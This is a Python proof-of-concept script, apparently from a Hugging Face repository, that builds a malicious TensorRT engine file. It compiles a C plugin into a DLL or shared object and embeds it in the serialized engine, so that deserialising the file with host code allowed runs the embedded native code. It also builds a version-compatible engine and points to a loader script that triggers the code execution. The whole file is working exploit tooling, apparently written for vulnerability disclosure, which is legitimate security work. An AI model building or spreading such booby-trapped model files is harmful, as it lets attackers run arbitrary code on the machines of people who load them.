# tensorrt-engine-rce-poc / build_poc.py
# treforbenbow's picture
# Upload build_poc.py with huggingface_hub
# 9f36fb4 verified
#!/usr/bin/env python3
"""
PoC Builder: Creates a malicious TensorRT engine file with embedded native code.
This script:
1. Compiles a malicious DLL/SO with code that executes on load
2. Builds a TensorRT engine embedding the malicious library
3. The resulting .engine file triggers arbitrary code execution when deserialized
Usage: python build_poc.py
"""
import os
import sys
import subprocess
import tempfile
import struct
import platform
# Paths are resolved relative to this script: the project root is the parent
# of the script's directory, and every build artifact goes into
# <project>/evidence.
SCRIPT_DIR = os.path.split(os.path.abspath(__file__))[0]
PROJECT_DIR = os.path.split(SCRIPT_DIR)[0]
EVIDENCE_DIR = os.path.join(PROJECT_DIR, "evidence")
# Created at import time so the build phases can write into it unconditionally.
os.makedirs(EVIDENCE_DIR, exist_ok=True)
def find_msvc():
    """Locate the 64-bit MSVC compiler (cl.exe) on Windows.

    The default Visual Studio install roots under "Program Files" and
    "Program Files (x86)" are searched in that order. From the first root
    that yields any match, the lexicographically greatest path is returned
    as an approximation of the newest toolset.

    Returns:
        Full path to cl.exe, or None when no installation is found.
    """
    import glob
    search_patterns = (
        r"C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe",
        r"C:\Program Files (x86)\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe",
    )
    # Lazily glob each root; stop at the first one that has any hit.
    hits_per_root = (glob.glob(pattern) for pattern in search_patterns)
    first_hits = next((hits for hits in hits_per_root if hits), None)
    if first_hits is None:
        return None
    return max(first_hits)  # Latest version
def find_msvc_env():
    """Locate vcvarsall.bat, the script that sets up the MSVC build environment.

    The default Visual Studio install roots under "Program Files" and
    "Program Files (x86)" are searched in that order. From the first root
    that yields any match, the lexicographically greatest path is returned.

    Returns:
        Full path to vcvarsall.bat, or None when no installation is found.
    """
    import glob
    search_patterns = (
        r"C:\Program Files\Microsoft Visual Studio\*\*\VC\Auxiliary\Build\vcvarsall.bat",
        r"C:\Program Files (x86)\Microsoft Visual Studio\*\*\VC\Auxiliary\Build\vcvarsall.bat",
    )
    hits_per_root = (glob.glob(pattern) for pattern in search_patterns)
    first_hits = next((hits for hits in hits_per_root if hits), None)
    return None if first_hits is None else max(first_hits)
def compile_dll_windows(source_path: str, output_path: str) -> bool:
    """Compile the malicious plugin as a Windows DLL using MSVC.

    vcvarsall.bat (x64) and cl.exe are chained in one cmd.exe session, so the
    compiler inherits the environment that vcvarsall sets up.

    Args:
        source_path: Path to the C source file to compile.
        output_path: Where the DLL should be written (passed to ``/Fe:``).

    Returns:
        True if the compiler ran successfully and the DLL exists afterwards.
        False otherwise; every failure path prints a diagnostic.
    """
    vcvarsall = find_msvc_env()
    if not vcvarsall:
        print("[!] Could not find vcvarsall.bat")
        return False
    # Use absolute paths. cl.exe runs with cwd=output_dir, while the
    # os.path.exists check below runs in this process's cwd; relative paths
    # would be resolved against two different directories. This also
    # guarantees output_dir is never "" (an invalid cwd).
    source_path = os.path.abspath(source_path)
    output_path = os.path.abspath(output_path)
    # Run in the output directory so cl.exe's intermediate files land there.
    output_dir = os.path.dirname(output_path)
    cmd = f'"{vcvarsall}" x64 && cl.exe /LD /Fe:"{output_path}" "{source_path}" /link /DLL'
    print(f"[*] Compiling DLL: {cmd}")
    # Hand cmd.exe a ready-made command line rather than an argv list. For a
    # list, subprocess quotes with MS C runtime rules (\"), which cmd.exe does
    # not understand, so the quoted "C:\Program Files\..." path would break.
    # With /S, cmd.exe strips exactly the outer pair of quotes and runs the
    # rest verbatim.
    command_line = f'cmd.exe /s /c "{cmd}"'
    try:
        result = subprocess.run(
            command_line,
            capture_output=True, text=True, errors="replace",
            cwd=output_dir,
        )
    except OSError as exc:
        # cmd.exe unavailable (e.g. non-Windows host) or unusable cwd.
        print(f"[!] Could not launch cmd.exe: {exc}")
        return False
    if result.returncode != 0:
        print(f"[!] Compilation failed:\n{result.stderr}\n{result.stdout}")
        return False
    if os.path.exists(output_path):
        print(f"[+] DLL compiled: {output_path} ({os.path.getsize(output_path)} bytes)")
        return True
    print("[!] DLL file not found after compilation")
    return False
def compile_so_linux(source_path: str, output_path: str) -> bool:
    """Compile the malicious plugin as a Linux .so using gcc.

    Args:
        source_path: Path to the C source file to compile.
        output_path: Where the shared object should be written.

    Returns:
        True if gcc succeeded and *output_path* exists afterwards.
        False otherwise, including when gcc is not installed; every failure
        path prints a diagnostic.
    """
    cmd = ["gcc", "-shared", "-fPIC", "-o", output_path, source_path, "-Wl,--no-as-needed"]
    print(f"[*] Compiling: {' '.join(cmd)}")
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, errors="replace")
    except OSError as exc:
        # gcc missing from PATH: report it like any other compile failure
        # instead of crashing with FileNotFoundError.
        print(f"[!] Compilation failed: {exc}")
        return False
    if result.returncode != 0:
        print(f"[!] Compilation failed: {result.stderr}")
        return False
    # Guard getsize below against a zero exit status with no output file.
    if not os.path.exists(output_path):
        print("[!] SO file not found after compilation")
        return False
    print(f"[+] SO compiled: {output_path} ({os.path.getsize(output_path)} bytes)")
    return True
def build_engine(plugin_path: str, engine_path: str) -> bool:
    """Build a TensorRT engine with the malicious plugin embedded.

    Builds a minimal identity network (input "input", FLOAT, shape
    (1, 3, 224, 224) -> output "output"). It registers *plugin_path* in the
    builder config's ``plugins_to_serialize`` list, serializes the engine,
    and writes it to *engine_path*.

    Args:
        plugin_path: Path to the compiled DLL/SO to embed. It is converted
            to an absolute path before use.
        engine_path: Destination file for the serialized engine. An existing
            file is overwritten.

    Returns:
        True if the engine was built and written. False if the ``tensorrt``
        package cannot be imported, or if ``build_serialized_network``
        returns None.

    Raises:
        OSError: if *plugin_path* does not exist (raised by
            ``os.path.getsize``), or if the engine file cannot be written.
    """
    try:
        import tensorrt as trt
    except ImportError:
        print("[!] TensorRT not installed: pip install tensorrt")
        return False
    print(f"[*] TensorRT version: {trt.__version__}")
    # Logger severity threshold is WARNING.
    TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
    # Create builder and network
    builder = trt.Builder(TRT_LOGGER)
    # NOTE(review): EXPLICIT_BATCH is deprecated in newer TensorRT releases,
    # where explicit batch is the default. Confirm for the target version.
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    config = builder.create_builder_config()
    # Minimal identity network
    inp = network.add_input("input", trt.DataType.FLOAT, (1, 3, 224, 224))
    identity = network.add_identity(inp)
    identity.get_output(0).name = "output"
    network.mark_output(identity.get_output(0))
    # CRITICAL: Embed the malicious plugin into the engine file
    # This serializes the entire binary content of the DLL/SO into the .engine file.
    # When loaded with engine_host_code_allowed=True, TensorRT extracts and LoadLibrary/dlopen's it.
    plugin_path_abs = os.path.abspath(plugin_path)
    print(f"[*] Embedding plugin: {plugin_path_abs}")
    print(f"[*] Plugin size: {os.path.getsize(plugin_path_abs)} bytes")
    config.plugins_to_serialize = [plugin_path_abs]
    print("[*] Building serialized network...")
    serialized = builder.build_serialized_network(network, config)
    if serialized is None:
        print("[!] Engine build failed (build_serialized_network returned None)")
        print("[!] This may indicate the plugin library format is incompatible")
        return False
    # Copy the serialized engine into a Python bytes object for writing and searching.
    engine_bytes = bytes(serialized)
    with open(engine_path, "wb") as f:
        f.write(engine_bytes)
    print(f"[+] Engine saved: {engine_path}")
    print(f"[+] Engine size: {len(engine_bytes)} bytes")
    # Verify the plugin binary is embedded in the engine.
    # Heuristic only: it searches the engine bytes for the first 64 bytes of
    # the plugin file. The outcome is printed and does not affect the return
    # value.
    with open(plugin_path_abs, "rb") as f:
        plugin_bytes = f.read()
    if plugin_bytes[:64] in engine_bytes:
        print(f"[+] CONFIRMED: Plugin binary content found embedded in engine file")
    else:
        print("[*] Note: Plugin may be stored in a transformed format within the engine")
    return True
def try_version_compatible_engine(engine_path: str) -> bool:
    """
    Alternative: Build a version-compatible engine that embeds the lean runtime.
    This demonstrates that even WITHOUT custom plugins, the engine format
    can carry executable code (the lean runtime itself).

    The function builds a minimal identity network (input "input", FLOAT,
    (1, 3, 224, 224) -> output "output") with
    ``BuilderFlag.VERSION_COMPATIBLE`` set and no plugins. The result is
    written next to *engine_path* as ``<root>_version_compatible<ext>``, where
    ``root, ext = os.path.splitext(engine_path)``. This means *engine_path*
    itself is never overwritten and directory names are left untouched.

    Args:
        engine_path: Path of the primary engine. It is used only to derive
            the output file name.

    Returns:
        True if the engine was built and written. False if ``tensorrt``
        cannot be imported, setting the flag or building raises, the build
        returns no engine, or the output file cannot be written.
    """
    try:
        import tensorrt as trt
    except ImportError:
        return False
    TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(TRT_LOGGER)
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    config = builder.create_builder_config()
    inp = network.add_input("input", trt.DataType.FLOAT, (1, 3, 224, 224))
    identity = network.add_identity(inp)
    identity.get_output(0).name = "output"
    network.mark_output(identity.get_output(0))
    # Enable version-compatible mode — this embeds libnvinfer_lean into the engine
    try:
        config.set_flag(trt.BuilderFlag.VERSION_COMPATIBLE)
        print("[*] Building version-compatible engine (embeds lean runtime)...")
        serialized = builder.build_serialized_network(network, config)
    except Exception as e:
        # Best effort: e.g. this TensorRT version has no VERSION_COMPATIBLE
        # flag, or the build itself raised.
        print(f"[*] Version-compatible build not supported: {e}")
        return False
    if not serialized:
        print("[!] Version-compatible engine build failed (build_serialized_network returned None)")
        return False
    engine_bytes = bytes(serialized)
    # Derive the output name from the final extension only. str.replace would
    # also rewrite ".engine" inside directory names, and would return the
    # input path unchanged (overwriting it) when there is no ".engine" suffix.
    root, ext = os.path.splitext(engine_path)
    vc_path = f"{root}_version_compatible{ext}"
    try:
        with open(vc_path, "wb") as f:
            f.write(engine_bytes)
    except OSError as e:
        print(f"[!] Could not write version-compatible engine {vc_path}: {e}")
        return False
    print(f"[+] Version-compatible engine: {vc_path} ({len(engine_bytes)} bytes)")
    print("[+] This engine embeds the lean runtime (~40MB of native code)")
    return True
def main():
    """Build all PoC artifacts into EVIDENCE_DIR.

    Phase 1 compiles ``malicious_plugin.c`` (expected next to this script)
    into ``malicious_plugin.dll`` on Windows, or ``libmalicious_plugin.so``
    elsewhere. The process exits with status 1 if the source is missing or
    compilation fails.

    Phase 2 builds ``malicious_model.engine`` with that library embedded,
    via build_engine.

    Phase 3 builds a version-compatible engine exactly once: as the fallback
    when phase 2 fails, or as additional evidence when it succeeds.
    """
    print("=" * 70)
    print("TensorRT Engine File RCE PoC Builder")
    print("=" * 70)
    print()
    source_path = os.path.join(SCRIPT_DIR, "malicious_plugin.c")
    if not os.path.exists(source_path):
        print(f"[!] Plugin source not found: {source_path}")
        sys.exit(1)
    is_windows = platform.system() == "Windows"
    # Step 1: Compile the malicious plugin
    print("[*] Phase 1: Compiling malicious plugin...")
    if is_windows:
        plugin_path = os.path.join(EVIDENCE_DIR, "malicious_plugin.dll")
        success = compile_dll_windows(source_path, plugin_path)
    else:
        plugin_path = os.path.join(EVIDENCE_DIR, "libmalicious_plugin.so")
        success = compile_so_linux(source_path, plugin_path)
    if not success:
        print("[!] Plugin compilation failed")
        sys.exit(1)
    # Step 2: Build engine with embedded plugin
    print()
    print("[*] Phase 2: Building TensorRT engine with embedded malicious code...")
    engine_path = os.path.join(EVIDENCE_DIR, "malicious_model.engine")
    engine_built = build_engine(plugin_path, engine_path)
    # Step 3: Version-compatible engine, built only once. It serves as the
    # fallback when step 2 failed, or as extra evidence when step 2 succeeded.
    print()
    if engine_built:
        print("[*] Phase 3: Attempting version-compatible engine build (additional evidence)...")
    else:
        print("[!] Engine build with embedded plugin failed.")
        print("[*] Trying alternative: version-compatible engine...")
        print()
    try_version_compatible_engine(engine_path)
    print()
    print("=" * 70)
    print("[*] PoC Build Complete")
    print(f"[*] Evidence directory: {EVIDENCE_DIR}")
    print(f"[*] Plugin: {plugin_path}")
    # Also require this run's build to have succeeded; a file left by an
    # earlier run must not be reported as the current result.
    if engine_built and os.path.exists(engine_path):
        print(f"[*] Engine: {engine_path}")
        print()
        print("[*] To trigger RCE, run:")
        print(f" python load_poc.py \"{engine_path}\"")
    print("=" * 70)
# Run the builder only when executed as a script, not when imported.
if __name__ == "__main__":
    main()